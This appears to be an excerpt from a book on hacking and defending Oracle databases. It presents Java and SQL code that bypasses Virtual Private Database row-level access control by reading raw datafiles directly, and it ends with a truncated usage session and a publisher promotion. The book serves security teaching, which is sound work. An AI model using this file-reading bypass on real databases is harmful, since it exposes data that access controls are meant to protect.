8.2. Defeating VPDs with Raw File Access
You can entirely bypass database enforced access control by accessing the raw data file itself. This is fully covered in Chapter 11 — but here's the code now:
SET ESCAPE ON
SET ESCAPE "\"
SET SERVEROUTPUT ON
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADBINFILE" AS
import java.lang.*;
import java.io.*;
public class JAVAREADBINFILE
{
public static void readbinfile(String f, int start) throws
IOException
{
FileInputStream fis;
DataInputStream dis;
try
{
int i;
int ih,il;
int cnt = 1, h=0,l=0;
String hex[] = {"0", "1", "2","3", "4", "5", "6", "7",
"8","9", "A", "B", "C", "D", "E","F"};
RandomAccessFile raf = new RandomAccessFile (f, "r");
raf.seek (start);
for(i=0; i<=512; i++)
{
ih = il = raf.readByte() \& 0xFF;
h = ih ≫ 4;
l = il \& 0x0F;
System.out.print("\\\\x" + hex[h] + hex[l]);
if(cnt \% 16 == 0)
System.out.println();
cnt ++;
}
}
catch (EOFException eof)
{
System.out.println();
System.out.println( "EOF reached " );
}
catch (IOException ioe)
{
System.out.println( "IO error: " + ioe );
}
}
}
/
show errors
/
CREATE OR REPLACE PROCEDURE JAVAREADBINFILEPROC (p_filename IN
VARCHAR2, p_start in number)
AS LANGUAGE JAVA
NAME 'JAVAREADBINFILE.readbinfile (java.lang.String, int)';
/
show errors
/
Once this has been created you can use it to read the files directly — in this case, the VPDTESTTABLE exists in the USERS tablespace:
SQL> set serveroutput on SQL> exec dbms_java.set_output(2000); PL/SQL procedure successfully completed. SQL> ...
Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
